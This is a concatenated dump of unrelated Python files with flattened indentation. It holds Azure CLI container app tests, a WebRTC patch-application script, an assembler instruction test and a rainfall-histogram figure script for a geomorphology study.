RESULT_DIR = os.path.join(config.RESULT_DIR, "IMBALANCED", "COREG")
if not os.path.exists(RESULT_DIR):
os.makedirs(RESULT_DIR)
np.save(os.path.join(RESULT_DIR, "k_RMSE_6"), k_RMSE)
| StarcoderdataPython |
6588234 |
from .defaults import get_default_config
from .defaults import imagedata_kwargs, optimizer_kwargs, lr_scheduler_kwargs, engine_run_kwargs
from .defaults import get_defeault_exp_name | StarcoderdataPython |
105463 | <filename>src/containerapp/azext_containerapp/tests/latest/test_containerapp_commands.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import time
import unittest
from azure.cli.testsdk.scenario_tests import AllowLargeResponse, live_only
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck)
from msrestazure.tools import parse_resource_id
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class ContainerappIdentityTests(ScenarioTest):
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="eastus2")
@live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
def test_containerapp_identity_e2e(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
user_identity_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))
self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name))
self.cmd('containerapp identity assign --user-assigned {} -g {} -n {}'.format(user_identity_name, resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
])
self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name, resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="canadacentral")
def test_containerapp_identity_system(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {} --system-assigned'.format(resource_group, ca_name, env_name))
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
@AllowLargeResponse(8192)
@live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
@ResourceGroupPreparer(location="westeurope")
def test_containerapp_identity_user(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
user_identity_name1 = self.create_random_name(prefix='containerapp-user1', length=24)
user_identity_name2 = self.create_random_name(prefix='containerapp-user2', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))
self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name1))
self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name2))
self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity assign --user-assigned {} {} -g {} -n {}'.format(user_identity_name1, user_identity_name2, resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
])
self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name1, resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
])
self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name2, resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'SystemAssigned'),
])
self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('type', 'None'),
])
class ContainerappIngressTests(ScenarioTest):
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="eastus2")
def test_containerapp_ingress_e2e(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name))
self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
JMESPathCheck('external', True),
JMESPathCheck('targetPort', 80),
])
self.cmd('containerapp ingress disable -g {} -n {}'.format(resource_group, ca_name, env_name))
containerapp_def = self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()
self.assertEqual("fqdn" in containerapp_def["properties"]["configuration"], False)
self.cmd('containerapp ingress enable -g {} -n {} --type internal --target-port 81 --allow-insecure --transport http2'.format(resource_group, ca_name, env_name))
self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
JMESPathCheck('external', False),
JMESPathCheck('targetPort', 81),
JMESPathCheck('allowInsecure', True),
JMESPathCheck('transport', "Http2"),
])
self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
JMESPathCheck('external', False),
JMESPathCheck('targetPort', 81),
JMESPathCheck('allowInsecure', True),
JMESPathCheck('transport', "Http2"),
])
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="eastus2")
def test_containerapp_ingress_traffic_e2e(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name))
self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('external', True),
JMESPathCheck('targetPort', 80),
])
self.cmd('containerapp ingress traffic set -g {} -n {} --revision-weight latest=100'.format(resource_group, ca_name), checks=[
JMESPathCheck('[0].latestRevision', True),
JMESPathCheck('[0].weight', 100),
])
self.cmd('containerapp update -g {} -n {} --cpu 1.0 --memory 2Gi'.format(resource_group, ca_name))
revisions_list = self.cmd('containerapp revision list -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()
self.cmd('containerapp ingress traffic set -g {} -n {} --revision-weight latest=50 {}=50'.format(resource_group, ca_name, revisions_list[0]["name"]), checks=[
JMESPathCheck('[0].latestRevision', True),
JMESPathCheck('[0].weight', 50),
JMESPathCheck('[1].revisionName', revisions_list[0]["name"]),
JMESPathCheck('[1].weight', 50),
])
self.cmd('containerapp ingress traffic show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('[0].latestRevision', True),
JMESPathCheck('[0].weight', 50),
JMESPathCheck('[1].revisionName', revisions_list[0]["name"]),
JMESPathCheck('[1].weight', 50),
])
revisions_list = self.cmd('containerapp revision list -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()
for revision in revisions_list:
self.assertEqual(revision["properties"]["trafficWeight"], 50)
@AllowLargeResponse(8192)
@live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
@ResourceGroupPreparer(location="westeurope")
def test_containerapp_custom_domains_e2e(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
app = self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name)).get_output_in_json()
self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('length(@)', 0),
])
# list hostnames with a wrong location
self.cmd('containerapp hostname list -g {} -n {} -l "{}"'.format(resource_group, ca_name, "eastus2"), checks={
JMESPathCheck('length(@)', 0),
}, expect_failure=True)
# create an App service domain and update its txt records
contacts = os.path.join(TEST_DIR, 'domain-contact.json')
zone_name = "{}.com".format(ca_name)
subdomain_1 = "devtest"
subdomain_2 = "clitest"
txt_name_1 = "asuid.{}".format(subdomain_1)
txt_name_2 = "asuid.{}".format(subdomain_2)
hostname_1 = "{}.{}".format(subdomain_1, zone_name)
hostname_2 = "{}.{}".format(subdomain_2, zone_name)
verification_id = app["properties"]["customDomainVerificationId"]
self.cmd("appservice domain create -g {} --hostname {} --contact-info=@'{}' --accept-terms".format(resource_group, zone_name, contacts)).get_output_in_json()
self.cmd('network dns record-set txt add-record -g {} -z {} -n {} -v {}'.format(resource_group, zone_name, txt_name_1, verification_id)).get_output_in_json()
self.cmd('network dns record-set txt add-record -g {} -z {} -n {} -v {}'.format(resource_group, zone_name, txt_name_2, verification_id)).get_output_in_json()
# upload cert, add hostname & binding
pfx_file = os.path.join(TEST_DIR, 'cert.pfx')
pfx_password = '<PASSWORD>'
cert_id = self.cmd('containerapp ssl upload -n {} -g {} --environment {} --hostname {} --certificate-file "{}" --password {}'.format(ca_name, resource_group, env_name, hostname_1, pfx_file, pfx_password), checks=[
JMESPathCheck('[0].name', hostname_1),
]).get_output_in_json()[0]["certificateId"]
self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].name', hostname_1),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
])
# get cert thumbprint
cert_thumbprint = self.cmd('containerapp env certificate list -n {} -g {} -c {}'.format(env_name, resource_group, cert_id), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].id', cert_id),
]).get_output_in_json()[0]["properties"]["thumbprint"]
# add binding by cert thumbprint
self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --thumbprint {}'.format(resource_group, ca_name, hostname_2, cert_thumbprint), expect_failure=True)
self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --thumbprint {} -e {}'.format(resource_group, ca_name, hostname_2, cert_thumbprint, env_name), checks=[
JMESPathCheck('length(@)', 2),
])
self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('length(@)', 2),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
JMESPathCheck('[1].bindingType', "SniEnabled"),
JMESPathCheck('[1].certificateId', cert_id),
])
# delete hostname with a wrong location
self.cmd('containerapp hostname delete -g {} -n {} --hostname {} -l "{}" --yes'.format(resource_group, ca_name, hostname_1, "eastus2"), expect_failure=True)
self.cmd('containerapp hostname delete -g {} -n {} --hostname {} -l "{}" --yes'.format(resource_group, ca_name, hostname_1, app["location"]), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].name', hostname_2),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
]).get_output_in_json()
self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].name', hostname_2),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
])
self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_2), checks=[
JMESPathCheck('length(@)', 0),
]).get_output_in_json()
# add binding by cert id
self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {}'.format(resource_group, ca_name, hostname_2, cert_id), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
JMESPathCheck('[0].name', hostname_2),
]).get_output_in_json()
self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_2), checks=[
JMESPathCheck('length(@)', 0),
]).get_output_in_json()
# add binding by cert name, with and without environment
cert_name = parse_resource_id(cert_id)["resource_name"]
self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {}'.format(resource_group, ca_name, hostname_1, cert_name), expect_failure=True)
self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {} -e {}'.format(resource_group, ca_name, hostname_1, cert_name, env_name), checks=[
JMESPathCheck('length(@)', 1),
JMESPathCheck('[0].bindingType', "SniEnabled"),
JMESPathCheck('[0].certificateId', cert_id),
JMESPathCheck('[0].name', hostname_1),
]).get_output_in_json()
self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_1), checks=[
JMESPathCheck('length(@)', 0),
]).get_output_in_json()
class ContainerappDaprTests(ScenarioTest):
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="eastus2")
def test_containerapp_dapr_e2e(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
ca_name = self.create_random_name(prefix='containerapp', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))
self.cmd('containerapp dapr enable -g {} -n {} --dapr-app-id containerapp1 --dapr-app-port 80 --dapr-app-protocol http'.format(resource_group, ca_name, env_name), checks=[
JMESPathCheck('appId', "containerapp1"),
JMESPathCheck('appPort', 80),
JMESPathCheck('appProtocol', "http"),
JMESPathCheck('enabled', True),
])
self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('properties.configuration.dapr.appId', "containerapp1"),
JMESPathCheck('properties.configuration.dapr.appPort', 80),
JMESPathCheck('properties.configuration.dapr.appProtocol', "http"),
JMESPathCheck('properties.configuration.dapr.enabled', True),
])
self.cmd('containerapp dapr disable -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
JMESPathCheck('appId', "containerapp1"),
JMESPathCheck('appPort', 80),
JMESPathCheck('appProtocol', "http"),
JMESPathCheck('enabled', False),
])
self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name), checks=[
JMESPathCheck('properties.configuration.dapr.appId', "containerapp1"),
JMESPathCheck('properties.configuration.dapr.appPort', 80),
JMESPathCheck('properties.configuration.dapr.appProtocol', "http"),
JMESPathCheck('properties.configuration.dapr.enabled', False),
])
class ContainerappEnvStorageTests(ScenarioTest):
@AllowLargeResponse(8192)
@ResourceGroupPreparer(location="eastus")
def test_containerapp_env_storage(self, resource_group):
env_name = self.create_random_name(prefix='containerapp-env', length=24)
storage_name = self.create_random_name(prefix='storage', length=24)
shares_name = self.create_random_name(prefix='share', length=24)
logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)
logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]
self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
time.sleep(5)
containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()
self.cmd('storage account create -g {} -n {} --kind StorageV2 --sku Standard_ZRS --enable-large-file-share'.format(resource_group, storage_name))
self.cmd('storage share-rm create -g {} -n {} --storage-account {} --access-tier "TransactionOptimized" --quota 1024'.format(resource_group, shares_name, storage_name))
storage_keys = self.cmd('az storage account keys list -g {} -n {}'.format(resource_group, storage_name)).get_output_in_json()[0]
self.cmd('containerapp env storage set -g {} -n {} --storage-name {} --azure-file-account-name {} --azure-file-account-key {} --access-mode ReadOnly --azure-file-share-name {}'.format(resource_group, env_name, storage_name, storage_name, storage_keys["value"], shares_name), checks=[
JMESPathCheck('name', storage_name),
])
self.cmd('containerapp env storage show -g {} -n {} --storage-name {}'.format(resource_group, env_name, storage_name), checks=[
JMESPathCheck('name', storage_name),
])
self.cmd('containerapp env storage list -g {} -n {}'.format(resource_group, env_name), checks=[
JMESPathCheck('[0].name', storage_name),
])
self.cmd('containerapp env storage remove -g {} -n {} --storage-name {} --yes'.format(resource_group, env_name, storage_name))
self.cmd('containerapp env storage list -g {} -n {}'.format(resource_group, env_name), checks=[
JMESPathCheck('length(@)', 0),
])
| StarcoderdataPython |
9632801 | #########################################################
# 2020-01-23 23:25:05
# AI
# ins: CPL A
#########################################################
from .. import testutil as u
from ..asmconst import *
p = u.create_test()
for value in range(0x100):
p += atl.move(SFR_A, atl.I(value))
p += "CPL A"
p += atl.aste(SFR_A, atl.I((~value) & 0xFF))
| StarcoderdataPython |
8057901 | <gh_stars>0
#!/usr/bin/env python
# Copyright (C) <2018> Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""
Prepare development environment.
"""
import os
import shutil
import sys
import subprocess
HOME_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
PATCH_PATH = os.path.join(HOME_PATH, 'talk', 'owt', 'patches')
TESTING_PATH = os.path.join(HOME_PATH, 'testing')
THIRD_PARTY_PATH = os.path.join(HOME_PATH, 'third_party')
LIBSRTP_PATH = os.path.join(THIRD_PARTY_PATH, 'libsrtp')
WEBRTC_OVERRIDES_PATH = os.path.join(THIRD_PARTY_PATH, 'webrtc_overrides')
BUILD_PATH = os.path.join(HOME_PATH, 'build')
BASE_PATH = os.path.join(HOME_PATH, 'base')
platform = os.name
useShell = False
if(platform == "nt"):
useShell = True
def _patch():
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0001-Use-OpenSSL-for-usrsctp.patch')], shell=useShell, cwd=THIRD_PARTY_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=THIRD_PARTY_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0002-Use-OpenSSL-for-libsrtp.patch')], shell=useShell, cwd=LIBSRTP_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=LIBSRTP_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0003-Start-iOS-simulator-before-running-tests.patch')], shell=useShell, cwd=TESTING_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=TESTING_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0004-Remove-webrtc_overrides.patch')], shell=useShell, cwd=THIRD_PARTY_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=THIRD_PARTY_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0005-Fixed-compile-issue-and-disable-thin-archive.patch')], shell=useShell, cwd=BUILD_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=BUILD_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0009-Fix-compile-issue-for-linux-g-build.patch')], shell=useShell, cwd=BUILD_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=BUILD_PATH)
if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0006-Adjusted-jni_generator.py-to-fit-OWT-code-structure.patch')], shell=useShell, cwd=BASE_PATH)) != 0:
subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=BASE_PATH)
#if (subprocess.call(['git', 'am', os.path.join(PATCH_PATH, '0008-ios-Various-build-fixes-for-Xcode-10.patch')], shell=useShell, cwd=BUILD_PATH)) != 0:
# subprocess.call(['git', 'am', '--skip'], shell=useShell, cwd=BUILD_PATH)
def main(argv):
_patch()
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| StarcoderdataPython |
9681690 | <filename>_codes/_figurecodes/fig5_RainfallHistograms_CDFs.py
#/!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Figure 5 from Adams et al., "The competition between frequent and rare flood events:
impacts on erosion rates and landscape form"
Written by <NAME>
Updated April 14, 2020
"""
from landlab.io import read_esri_ascii, write_esri_ascii
from landlab.components import OverlandFlow, PrecipitationDistribution, DepthSlopeProductErosion, LinearDiffuser
import numpy as np
from landlab.utils.depth_dependent_roughness import depth_dependent_mannings_n
from matplotlib import pyplot as plt
from landlab.plot import imshow_grid
from scipy.stats import norm
import time
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "Helvetica"
plt.rcParams['font.size'] = 10
## Generate 1000 year precipitation time series
total_t = 1000.*365.25*24
lowRvar_PrecipDist = PrecipitationDistribution(mean_storm_duration = 11.75,
mean_interstorm_duration = 146.25,
mean_storm_depth = 4.775,
total_t=total_t)
highRvar_PrecipDist = PrecipitationDistribution(mean_storm_duration = 10.75,
mean_interstorm_duration = 433.58,
mean_storm_depth = 9.62,
total_t=total_t)
thresh = 0.5
# Get actual time series for the high Rvar case
highRvar_storm_arr = np.array(highRvar_PrecipDist.get_storm_time_series())
highRvar_intensity_threshold, = np.where(highRvar_storm_arr[:, 2] > thresh)
highRvar_durations = highRvar_storm_arr[highRvar_intensity_threshold][:,1]-highRvar_storm_arr[highRvar_intensity_threshold][:,0]
highRvar_durations_s = [x *3600. for x in highRvar_durations]
highRvar_intensities = highRvar_storm_arr[highRvar_intensity_threshold][:,2]
highRvar_depth = highRvar_durations * highRvar_intensities
highRvar_durations_raw = highRvar_storm_arr[:,1]-highRvar_storm_arr[:,0]
highRvar_intensities_raw = highRvar_storm_arr[:,2]
highRvar_depth_raw = highRvar_durations_raw * highRvar_intensities_raw
# Get actual time series for the low Rvar case
lowRvar_storm_arr = np.array(lowRvar_PrecipDist.get_storm_time_series())
lowRvar_intensity_threshold, = np.where(lowRvar_storm_arr[:, 2] > thresh)
lowRvar_durations = lowRvar_storm_arr[lowRvar_intensity_threshold][:,1]-lowRvar_storm_arr[lowRvar_intensity_threshold][:,0]
lowRvar_durations_s = [x *3600. for x in lowRvar_durations]
lowRvar_intensities = lowRvar_storm_arr[lowRvar_intensity_threshold][:,2]
lowRvar_depth = lowRvar_durations * lowRvar_intensities
lowRvar_durations_raw = lowRvar_storm_arr[:,1]-lowRvar_storm_arr[:,0]
lowRvar_intensities_raw = lowRvar_storm_arr[:,2]
lowRvar_depth_raw = lowRvar_durations_raw * lowRvar_intensities_raw
## Histogram weighting
highRvar_raw_weights = np.ones_like(highRvar_intensities_raw)/float(len(highRvar_intensities_raw))
highRvar_weights = np.ones_like(highRvar_intensities)/float(len(highRvar_intensities))
lowRvar_raw_weights = np.ones_like(lowRvar_intensities_raw)/float(len(lowRvar_intensities_raw))
lowRvar_weights = np.ones_like(lowRvar_intensities)/float(len(lowRvar_intensities))
dhighRvar_raw_weights = np.ones_like(highRvar_depth_raw)/float(len(highRvar_depth_raw))
dhighRvar_weights = np.ones_like(highRvar_depth)/float(len(highRvar_depth))
dlowRvar_raw_weights = np.ones_like(lowRvar_depth_raw)/float(len(lowRvar_depth_raw))
dlowRvar_weights = np.ones_like(lowRvar_depth)/float(len(lowRvar_depth))
## CDF creation
lowRvar_dur_cdf = norm.cdf(lowRvar_durations, np.average(lowRvar_durations), np.std(lowRvar_durations))
